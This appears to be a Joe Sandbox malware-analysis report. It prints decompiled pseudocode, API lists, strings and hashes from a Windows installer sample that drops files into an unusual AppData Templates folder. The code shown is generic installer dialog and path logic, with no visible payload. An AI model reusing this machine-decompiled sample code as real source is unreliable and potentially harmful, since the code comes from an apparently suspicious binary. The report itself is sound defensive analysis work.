                                                            							E004062EA(0x43c090, _t125, _t131,  &(0x43c090[lstrlenA(0x43c090)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                            							SetWindowTextA(_t125, 0x43c090); // executed
                                                            							_push(_t134);
                                                            							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                            							__eflags = _t65;
                                                            							if(_t65 != 0) {
                                                            								continue;
                                                            							} else {
                                                            								__eflags =  *_t131 - _t134;
                                                            								if( *_t131 == _t134) {
                                                            									continue;
                                                            								}
                                                            								__eflags =  *(_t131 + 4) - 5;
                                                            								if( *(_t131 + 4) != 5) {
                                                            									DestroyWindow( *0x44e3f8); // executed
                                                            									 *0x438068 = _t131;
                                                            									__eflags =  *_t131 - _t134;
                                                            									if( *_t131 <= _t134) {
                                                            										goto L60;
                                                            									}
                                                            									_t71 = CreateDialogParamA( *0x452420,  *_t131 +  *0x44e400 & 0x0000ffff, _t125,  *( *(_t131 + 4) * 4 + "?D@"), _t131); // executed
                                                            									__eflags = _t71 - _t134;
                                                            									 *0x44e3f8 = _t71;
                                                            									if(_t71 == _t134) {
                                                            										goto L60;
                                                            									}
                                                            									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                            									_push(6);
                                                            									E004042D4(_t71);
                                                            									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
                                                            									ScreenToClient(_t125, _t135 + 0x10);
                                                            									SetWindowPos( *0x44e3f8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                            									_push(_t134);
                                                            									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                            									__eflags =  *0x44e3ec - _t134;
                                                            									if( *0x44e3ec != _t134) {
                                                            										goto L63;
                                                            									}
                                                            									ShowWindow( *0x44e3f8, 8); // executed
                                                            									E00404320(0x405);
                                                            									goto L60;
                                                            								}
                                                            								__eflags =  *0x4524ac - _t134;
                                                            								if( *0x4524ac != _t134) {
                                                            									goto L63;
                                                            								}
                                                            								__eflags =  *0x4524a0 - _t134;
                                                            								if( *0x4524a0 != _t134) {
                                                            									continue;
                                                            								}
                                                            								goto L63;
                                                            							}
                                                            						}
                                                            						DestroyWindow( *0x44e3f8);
                                                            						 *0x452428 = _t134;
                                                            						EndDialog(_t125,  *0x436060);
                                                            						goto L60;
                                                            					} else {
                                                            						__eflags = _t32 - 1;
                                                            						if(_t32 != 1) {
                                                            							L35:
                                                            							__eflags =  *_t131 - _t134;
                                                            							if( *_t131 == _t134) {
                                                            								goto L63;
                                                            							}
                                                            							goto L36;
                                                            						}
                                                            						_push(0);
                                                            						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                            						__eflags = _t84;
                                                            						if(_t84 == 0) {
                                                            							goto L35;
                                                            						}
                                                            						SendMessageA( *0x44e3f8, 0x40f, 0, 1);
                                                            						__eflags =  *0x44e3ec;
                                                            						return 0 |  *0x44e3ec == 0x00000000;
                                                            					}
                                                            				} else {
                                                            					_t125 = _a4;
                                                            					_t134 = 0;
                                                            					if(_t128 == 0x47) {
                                                            						SetWindowPos( *0x43c070, _t125, 0, 0, 0, 0, 0x13);
                                                            					}
                                                            					_t120 = _a12;
                                                            					if(_t128 != 5) {
                                                            						L8:
                                                            						if(_t128 != 0x40d) {
                                                            							__eflags = _t128 - 0x11;
                                                            							if(_t128 != 0x11) {
                                                            								__eflags = _t128 - 0x111;
                                                            								if(_t128 != 0x111) {
                                                            									goto L28;
                                                            								}
                                                            								_t133 = _t120 & 0x0000ffff;
                                                            								_t126 = GetDlgItem(_t125, _t133);
                                                            								__eflags = _t126 - _t134;
                                                            								if(_t126 == _t134) {
                                                            									L15:
                                                            									__eflags = _t133 - 1;
                                                            									if(_t133 != 1) {
                                                            										__eflags = _t133 - 3;
                                                            										if(_t133 != 3) {
                                                            											_t127 = 2;
                                                            											__eflags = _t133 - _t127;
                                                            											if(_t133 != _t127) {
                                                            												L27:
                                                            												SendMessageA( *0x44e3f8, 0x111, _t120, _a16);
                                                            												goto L28;
                                                            											}
                                                            											__eflags =  *0x4524ac - _t134;
                                                            											if( *0x4524ac == _t134) {
                                                            												_t97 = E0040140B(3);
                                                            												__eflags = _t97;
                                                            												if(_t97 != 0) {
                                                            													goto L28;
                                                            												}
                                                            												 *0x436060 = 1;
                                                            												L23:
                                                            												_push(0x78);
                                                            												L24:
                                                            												E004042AD();
                                                            												goto L28;
                                                            											}
                                                            											E0040140B(_t127);
                                                            											 *0x436060 = _t127;
                                                            											goto L23;
                                                            										}
                                                            										__eflags =  *0x40a1dc - _t134; // 0x0
                                                            										if(__eflags <= 0) {
                                                            											goto L27;
                                                            										}
                                                            										_push(0xffffffff);
                                                            										goto L24;
                                                            									}
                                                            									_push(_t133);
                                                            									goto L24;
                                                            								}
                                                            								SendMessageA(_t126, 0xf3, _t134, _t134);
                                                            								_t101 = IsWindowEnabled(_t126);
                                                            								__eflags = _t101;
                                                            								if(_t101 == 0) {
                                                            									L63:
                                                            									return 0;
                                                            								}
                                                            								goto L15;
                                                            							}
                                                            							SetWindowLongA(_t125, _t134, _t134);
                                                            							return 1;
                                                            						}
                                                            						DestroyWindow( *0x44e3f8);
                                                            						 *0x44e3f8 = _t120;
                                                            						L60:
                                                            						if( *0x444090 == _t134 &&  *0x44e3f8 != _t134) {
                                                            							ShowWindow(_t125, 0xa); // executed
                                                            							 *0x444090 = 1;
                                                            						}
                                                            						goto L63;
                                                            					} else {
                                                            						asm("sbb eax, eax");
                                                            						ShowWindow( *0x43c070,  ~(_t120 - 1) & 0x00000005);
                                                            						if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                            							L28:
                                                            							return E0040433B(_a8, _t120, _a16);
                                                            						} else {
                                                            							ShowWindow(_t125, 4);
                                                            							goto L8;
                                                            						}
                                                            					}
                                                            				}
                                                            			}































                                                            0x00403f0c
                                                            0x00403eff
                                                            0x00403f04
                                                            0x00000000
                                                            0x00403f04
                                                            0x00403ee3
                                                            0x00403ee9
                                                            0x00000000
                                                            0x00000000
                                                            0x00403eeb
                                                            0x00000000
                                                            0x00403eeb
                                                            0x00403edb
                                                            0x00000000
                                                            0x00403edb
                                                            0x00403ec1
                                                            0x00403ec8
                                                            0x00403ece
                                                            0x00403ed0
                                                            0x004042a1
                                                            0x00000000
                                                            0x004042a1
                                                            0x00000000
                                                            0x00403ed0
                                                            0x00403e8e
                                                            0x00000000
                                                            0x00403e96
                                                            0x00403e75
                                                            0x00403e7b
                                                            0x0040427e
                                                            0x00404284
                                                            0x00404291
                                                            0x00404297
                                                            0x00404297
                                                            0x00000000
                                                            0x00403e25
                                                            0x00403e2a
                                                            0x00403e36
                                                            0x00403e3f
                                                            0x00403f40
                                                            0x00000000
                                                            0x00403e5e
                                                            0x00403e61
                                                            0x00000000
                                                            0x00403e61
                                                            0x00403e3f
                                                            0x00403e23

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                            • ShowWindow.USER32(?), ref: 00403E36
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00403E48
                                                            • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                            • DestroyWindow.USER32 ref: 00403E75
                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E8E
                                                            • GetDlgItem.USER32(?,?), ref: 00403EAD
                                                            • SendMessageA.USER32 ref: 00403EC1
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403F73
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403F7D
                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403F97
                                                            • SendMessageA.USER32 ref: 00403FE8
                                                            • GetDlgItem.USER32(?,00000003), ref: 0040408E
                                                            • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                            • EnableWindow.USER32(?,?), ref: 004040DC
                                                            • GetSystemMenu.USER32 ref: 004040F2
                                                            • EnableMenuItem.USER32 ref: 004040F9
                                                            • SendMessageA.USER32 ref: 00404111
                                                            • SendMessageA.USER32 ref: 00404124
                                                            • lstrlenA.KERNEL32(0043C090,?,0043C090,00000000), ref: 0040414E
                                                            • SetWindowTextA.USER32(?,0043C090), ref: 0040415D
                                                            • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: <r
                                                            • API String ID: 121052019-2530491772
                                                            • Opcode ID: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction ID: 1a69bbab5f1dc0e71ac1873d296b8d42e3e712d362af29a70bde279b026b61fc
                                                            • Opcode Fuzzy Hash: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction Fuzzy Hash: 35C1F471900205AFDB216F61EE85E2B3A78FB86749F01053EFA41B21F1CB3898519B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Control-flow graph for function 00403A3D; legend: Executed, Not Executed]
                                                            C-Code - Quality: 96%
                                                            			E00403A3D(void* __eflags) {
                                                            				intOrPtr _v4;
                                                            				intOrPtr _v8;
                                                            				int _v12;
                                                            				void _v16;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t17;
                                                            				void* _t25;
                                                            				void* _t27;
                                                            				int _t28;
                                                            				void* _t31;
                                                            				int _t34;
                                                            				int _t35;
                                                            				int _t39;
                                                            				char _t57;
                                                            				CHAR* _t59;
                                                            				signed char _t63;
                                                            				CHAR* _t74;
                                                            				intOrPtr _t76;
                                                            				CHAR* _t81;
                                                            
                                                            				_t76 =  *0x452430;
                                                            				_t17 = E00406663(2);
                                                            				_t84 = _t17;
                                                            				if(_t17 == 0) {
                                                            					_t74 = 0x43c090;
                                                            					 *0x483000 = 0x30;
                                                            					 *0x483001 = 0x78;
                                                            					 *0x483002 = 0;
                                                            					E0040613E(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x43c090, 0);
                                                            					__eflags =  *0x43c090;
                                                            					if(__eflags == 0) {
                                                            						E0040613E(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x43c090, 0);
                                                            					}
                                                            					lstrcatA(0x483000, _t74);
                                                            				} else {
                                                            					E004061B5(0x483000,  *_t17() & 0x0000ffff);
                                                            				}
                                                            				E00403D02(_t71, _t84);
                                                            				_t80 = "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes";
                                                            				 *0x4524a0 =  *0x452438 & 0x00000020;
                                                            				 *0x4524bc = 0x10000;
                                                            				if(E00405CD7(_t84, "C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes") != 0) {
                                                            					L16:
                                                            					if(E00405CD7(_t92, _t80) == 0) {
                                                            						E004062EA(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
                                                            					}
                                                            					_t25 = LoadImageA( *0x452420, 0x67, 1, 0, 0, 0x8040);
                                                            					 *0x44e408 = _t25;
                                                            					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                            						L21:
                                                            						if(E0040140B(0) == 0) {
                                                            							_t27 = E00403D02(_t71, __eflags);
                                                            							__eflags =  *0x4524c0;
                                                            							if( *0x4524c0 != 0) {
                                                            								_t28 = E0040544A(_t27, 0);
                                                            								__eflags = _t28;
                                                            								if(_t28 == 0) {
                                                            									E0040140B(1);
                                                            									goto L33;
                                                            								}
                                                            								__eflags =  *0x44e3ec;
                                                            								if( *0x44e3ec == 0) {
                                                            									E0040140B(2);
                                                            								}
                                                            								goto L22;
                                                            							}
                                                            							ShowWindow( *0x43c070, 5); // executed
                                                            							_t34 = E004065F5("RichEd20"); // executed
                                                            							__eflags = _t34;
                                                            							if(_t34 == 0) {
                                                            								E004065F5("RichEd32");
                                                            							}
                                                            							_t81 = "RichEdit20A";
                                                            							_t35 = GetClassInfoA(0, _t81, 0x44e3c0);
                                                            							__eflags = _t35;
                                                            							if(_t35 == 0) {
                                                            								GetClassInfoA(0, "RichEdit", 0x44e3c0);
                                                            								 *0x44e3e4 = _t81;
                                                            								RegisterClassA(0x44e3c0);
                                                            							}
                                                            							_t39 = DialogBoxParamA( *0x452420,  *0x44e400 + 0x00000069 & 0x0000ffff, 0, E00403DDA, 0); // executed
                                                            							E0040398D(E0040140B(5), 1);
                                                            							return _t39;
                                                            						}
                                                            						L22:
                                                            						_t31 = 2;
                                                            						return _t31;
                                                            					} else {
                                                            						_t71 =  *0x452420;
                                                            						 *0x44e3c4 = E00401000;
                                                            						 *0x44e3d0 =  *0x452420;
                                                            						 *0x44e3d4 = _t25;
                                                            						 *0x44e3e4 = 0x40a1f4;
                                                            						if(RegisterClassA(0x44e3c0) == 0) {
                                                            							L33:
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                            						 *0x43c070 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x452420, 0);
                                                            						goto L21;
                                                            					}
                                                            				} else {
                                                            					_t71 =  *(_t76 + 0x48);
                                                            					_t86 = _t71;
                                                            					if(_t71 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					_t74 = 0x44a3c0;
                                                            					E0040613E(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x452458, 0x44a3c0, 0);
                                                            					_t57 =  *0x44a3c0; // 0x43
                                                            					if(_t57 == 0) {
                                                            						goto L16;
                                                            					}
                                                            					if(_t57 == 0x22) {
                                                            						_t74 = 0x44a3c1;
                                                            						 *((char*)(E00405C14(0x44a3c1, 0x22))) = 0;
                                                            					}
                                                            					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                            					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                            						L15:
                                                            						E00406257(_t80, E00405BE9(_t74));
                                                            						goto L16;
                                                            					} else {
                                                            						_t63 = GetFileAttributesA(_t74);
                                                            						if(_t63 == 0xffffffff) {
                                                            							L14:
                                                            							E00405C30(_t74);
                                                            							goto L15;
                                                            						}
                                                            						_t92 = _t63 & 0x00000010;
                                                            						if((_t63 & 0x00000010) != 0) {
                                                            							goto L15;
                                                            						}
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            			}
























                                                            0x00403b5b
                                                            0x00000000
                                                            0x00403b5b
                                                            0x00403b56
                                                            0x00403b58
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403b58
                                                            0x00403b38

                                                            APIs
                                                              • Part of subcall function 00406663: GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                              • Part of subcall function 00406663: GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                            • lstrcatA.KERNEL32(00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754,00485000,?,0047B000,00000009,0000000B), ref: 00403AB8
                                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000,00000002,75572754), ref: 00403B2D
                                                            • lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00483000,0043C090,80000001,Control Panel\Desktop\ResourceLocale,00000000,0043C090,00000000), ref: 00403B40
                                                            • GetFileAttributesA.KERNEL32(Call,?,0047B000,00000009,0000000B), ref: 00403B4B
                                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes), ref: 00403B94
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403BD1
                                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE9
                                                            • CreateWindowExA.USER32 ref: 00403C1E
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403C54
                                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0044E3C0), ref: 00403C80
                                                            • GetClassInfoA.USER32(00000000,RichEdit,0044E3C0), ref: 00403C8D
                                                            • RegisterClassA.USER32(0044E3C0), ref: 00403C96
                                                            • DialogBoxParamA.USER32 ref: 00403CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: .DEFAULT\Control Panel\International$.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                            • API String ID: 1975747703-1037727787
                                                            • Opcode ID: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction ID: 9ed41b13b3066df8ef4fe5e21b3ba9d2433b63f5b2cc2a01767d3bc771330ebd
                                                            • Opcode Fuzzy Hash: 95bf514c9ea4fc9c592dd570d8c938eb6a532796c2675ae0dce3c92584506eb1
                                                            • Instruction Fuzzy Hash: A261B375644344AEE611AF669E45F3B3A6CEB4670EF00043FF941B62E3CA7C99019B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E004062EA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                            				struct _ITEMIDLIST* _v8;
                                                            				char _v12;
                                                            				signed int _v16;
                                                            				signed char _v20;
                                                            				signed int _v24;
                                                            				signed char _v28;
                                                            				signed int _t36;
                                                            				CHAR* _t37;
                                                            				signed int _t39;
                                                            				char _t50;
                                                            				char _t52;
                                                            				char _t54;
                                                            				void* _t62;
                                                            				char* _t63;
                                                            				signed int _t77;
                                                            				char _t85;
                                                            				void* _t86;
                                                            				CHAR* _t87;
                                                            				void* _t89;
                                                            				signed int _t94;
                                                            				signed int _t96;
                                                            				void* _t97;
                                                            
                                                            				_t89 = __esi;
                                                            				_t86 = __edi;
                                                            				_t62 = __ebx;
                                                            				_t36 = _a8;
                                                            				if(_t36 < 0) {
                                                            					_t36 =  *( *0x44e3fc - 4 + _t36 * 4);
                                                            				}
                                                            				_push(_t62);
                                                            				_push(_t89);
                                                            				_push(_t86);
                                                            				_t63 = _t36 +  *0x452458;
                                                            				_t37 = 0x44a3c0;
                                                            				_t87 = 0x44a3c0;
                                                            				if(_a4 >= 0x44a3c0 && _a4 - 0x44a3c0 < 0x4000) {
                                                            					_t87 = _a4;
                                                            					_a4 = _a4 & 0x00000000;
                                                            				}
                                                            				while(1) {
                                                            					_t85 =  *_t63;
                                                            					if(_t85 == 0) {
                                                            						break;
                                                            					}
                                                            					__eflags = _t87 - _t37 - 0x2000;
                                                            					if(_t87 - _t37 >= 0x2000) {
                                                            						break;
                                                            					}
                                                            					_t63 = _t63 + 1;
                                                            					__eflags = _t85 - 4;
                                                            					_a8 = _t63;
                                                            					if(__eflags >= 0) {
                                                            						if(__eflags != 0) {
                                                            							 *_t87 = _t85;
                                                            							_t87 =  &(_t87[1]);
                                                            							__eflags = _t87;
                                                            						} else {
                                                            							 *_t87 =  *_t63;
                                                            							_t87 =  &(_t87[1]);
                                                            							_t63 = _t63 + 1;
                                                            						}
                                                            						continue;
                                                            					}
                                                            					_t39 =  *((char*)(_t63 + 1));
                                                            					_t77 =  *_t63;
                                                            					_t94 = (_t39 & 0x0000007f) << 0x00000007 | _t77 & 0x0000007f;
                                                            					_v24 = _t77;
                                                            					_v28 = _t77 | 0x00000080;
                                                            					_v16 = _t39;
                                                            					_v20 = _t39 | 0x00000080;
                                                            					_t63 = _a8 + 2;
                                                            					__eflags = _t85 - 2;
                                                            					if(_t85 != 2) {
                                                            						__eflags = _t85 - 3;
                                                            						if(_t85 != 3) {
                                                            							__eflags = _t85 - 1;
                                                            							if(_t85 == 1) {
                                                            								__eflags = (_t39 | 0xffffffff) - _t94;
                                                            								E004062EA(_t63, _t87, _t94, _t87, (_t39 | 0xffffffff) - _t94);
                                                            							}
                                                            							L42:
                                                            							_t87 =  &(_t87[lstrlenA(_t87)]);
                                                            							_t37 = 0x44a3c0;
                                                            							continue;
                                                            						}
                                                            						__eflags = _t94 - 0x1d;
                                                            						if(_t94 != 0x1d) {
                                                            							__eflags = (_t94 << 0xd) + 0x453000;
                                                            							E00406257(_t87, (_t94 << 0xd) + 0x453000);
                                                            						} else {
                                                            							E004061B5(_t87,  *0x452428);
                                                            						}
                                                            						__eflags = _t94 + 0xffffffeb - 7;
                                                            						if(_t94 + 0xffffffeb < 7) {
                                                            							L33:
                                                            							E00406535(_t87);
                                                            						}
                                                            						goto L42;
                                                            					}
                                                            					__eflags =  *0x4524dc;
                                                            					_t96 = 2;
                                                            					if( *0x4524dc != 0) {
                                                            						L13:
                                                            						_a8 = 1;
                                                            						L14:
                                                            						__eflags =  *0x4524a4;
                                                            						if( *0x4524a4 != 0) {
                                                            							_t96 = 4;
                                                            						}
                                                            						__eflags = _t77;
                                                            						if(__eflags >= 0) {
                                                            							__eflags = _t77 - 0x25;
                                                            							if(_t77 != 0x25) {
                                                            								__eflags = _t77 - 0x24;
                                                            								if(_t77 == 0x24) {
                                                            									GetWindowsDirectoryA(_t87, 0x2000);
                                                            									_t96 = 0;
                                                            								}
                                                            								while(1) {
                                                            									__eflags = _t96;
                                                            									if(_t96 == 0) {
                                                            										goto L30;
                                                            									}
                                                            									_t50 =  *0x452424;
                                                            									_t96 = _t96 - 1;
                                                            									__eflags = _t50;
                                                            									if(_t50 == 0) {
                                                            										L26:
                                                            										_t52 = SHGetSpecialFolderLocation( *0x452428,  *(_t97 + _t96 * 4 - 0x18),  &_v8);
                                                            										__eflags = _t52;
                                                            										if(_t52 != 0) {
                                                            											L28:
                                                            											 *_t87 =  *_t87 & 0x00000000;
                                                            											__eflags =  *_t87;
                                                            											continue;
                                                            										}
                                                            										__imp__SHGetPathFromIDListA(_v8, _t87);
                                                            										_v12 = _t52;
                                                            										__imp__CoTaskMemFree(_v8);
                                                            										__eflags = _v12;
                                                            										if(_v12 != 0) {
                                                            											goto L30;
                                                            										}
                                                            										goto L28;
                                                            									}
                                                            									__eflags = _a8;
                                                            									if(_a8 == 0) {
                                                            										goto L26;
                                                            									}
                                                            									_t54 =  *_t50( *0x452428,  *(_t97 + _t96 * 4 - 0x18), 0, 0, _t87); // executed
                                                            									__eflags = _t54;
                                                            									if(_t54 == 0) {
                                                            										goto L30;
                                                            									}
                                                            									goto L26;
                                                            								}
                                                            								goto L30;
                                                            							}
                                                            							GetSystemDirectoryA(_t87, 0x2000);
                                                            							goto L30;
                                                            						} else {
                                                            							E0040613E((_t77 & 0x0000003f) +  *0x452458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t77 & 0x0000003f) +  *0x452458, _t87, _t77 & 0x00000040);
                                                            							__eflags =  *_t87;
                                                            							if( *_t87 != 0) {
                                                            								L31:
                                                            								__eflags = _v16 - 0x1a;
                                                            								if(_v16 == 0x1a) {
                                                            									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                            								}
                                                            								goto L33;
                                                            							}
                                                            							E004062EA(_t63, _t87, _t96, _t87, _v16);
                                                            							L30:
                                                            							__eflags =  *_t87;
                                                            							if( *_t87 == 0) {
                                                            								goto L33;
                                                            							}
                                                            							goto L31;
                                                            						}
                                                            					}
                                                            					__eflags =  *0x4524de - 0x45a;
                                                            					if( *0x4524de >= 0x45a) {
                                                            						goto L13;
                                                            					}
                                                            					__eflags = _t39 - 0x23;
                                                            					if(_t39 == 0x23) {
                                                            						goto L13;
                                                            					}
                                                            					__eflags = _t39 - 0x2e;
                                                            					if(_t39 == 0x2e) {
                                                            						goto L13;
                                                            					} else {
                                                            						_a8 = _a8 & 0x00000000;
                                                            						goto L14;
                                                            					}
                                                            				}
                                                            				 *_t87 =  *_t87 & 0x00000000;
                                                            				if(_a4 == 0) {
                                                            					return _t37;
                                                            				}
                                                            				return E00406257(_a4, _t37);
                                                            			}

























                                                            0x004064de
                                                            0x004064e1
                                                            0x004064aa
                                                            0x004064ab
                                                            0x004064ab
                                                            0x00000000
                                                            0x004064e1
                                                            0x00406398
                                                            0x004063a1
                                                            0x004063a2
                                                            0x004063bf
                                                            0x004063bf
                                                            0x004063c6
                                                            0x004063c6
                                                            0x004063cd
                                                            0x004063d1
                                                            0x004063d1
                                                            0x004063d2
                                                            0x004063d4
                                                            0x0040640d
                                                            0x00406410
                                                            0x00406420
                                                            0x00406423
                                                            0x0040642b
                                                            0x00406431
                                                            0x00406431
                                                            0x00406490
                                                            0x00406490
                                                            0x00406492
                                                            0x00000000
                                                            0x00000000
                                                            0x00406435
                                                            0x0040643c
                                                            0x0040643d
                                                            0x0040643f
                                                            0x00406459
                                                            0x00406467
                                                            0x0040646d
                                                            0x0040646f
                                                            0x0040648d
                                                            0x0040648d
                                                            0x0040648d
                                                            0x00000000
                                                            0x0040648d
                                                            0x00406475
                                                            0x0040647e
                                                            0x00406481
                                                            0x00406487
                                                            0x0040648b
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040648b
                                                            0x00406441
                                                            0x00406444
                                                            0x00000000
                                                            0x00000000
                                                            0x00406453
                                                            0x00406455
                                                            0x00406457
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406457
                                                            0x00000000
                                                            0x00406490
                                                            0x00406418
                                                            0x00000000
                                                            0x004063d6
                                                            0x004063f1
                                                            0x004063f6
                                                            0x004063f9
                                                            0x00406499
                                                            0x00406499
                                                            0x0040649d
                                                            0x004064a5
                                                            0x004064a5
                                                            0x00000000
                                                            0x0040649d
                                                            0x00406403
                                                            0x00406494
                                                            0x00406494
                                                            0x00406497
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406497
                                                            0x004063d4
                                                            0x004063a4
                                                            0x004063ad
                                                            0x00000000
                                                            0x00000000
                                                            0x004063af
                                                            0x004063b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004063b4
                                                            0x004063b7
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b9
                                                            0x00000000
                                                            0x004063b9
                                                            0x004063b7
                                                            0x0040651c
                                                            0x00406526
                                                            0x00406532
                                                            0x00406532
                                                            0x00000000

                                                            APIs
                                                            • GetSystemDirectoryA.KERNEL32(Call,00002000), ref: 00406418
                                                            • GetWindowsDirectoryA.KERNEL32(Call,00002000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000), ref: 0040642B
                                                            • SHGetSpecialFolderLocation.SHELL32(004053B0,7555110C,?), ref: 00406467
                                                            • SHGetPathFromIDListA.SHELL32(7555110C,Call), ref: 00406475
                                                            • CoTaskMemFree.OLE32(7555110C), ref: 00406481
                                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064A5
                                                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,004053B0,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,00000000,0042CE48,7555110C), ref: 004064F7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 717251189-320443853
                                                            • Opcode ID: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction ID: ebe98ae1178673def3e02426a949122db7229e586474bd24546af65fb667a20e
                                                            • Opcode Fuzzy Hash: 838a228d43f25cac2ee0c0fa74933bf62ea0f71a5a7e27bbbeaab37106ce29fc
                                                            • Instruction Fuzzy Hash: D5611571900204AFEF219F24DD94B7E3BA4AB06714F12403FE943BA2D2D67C89A1DB5D
                                                            Uniqueness

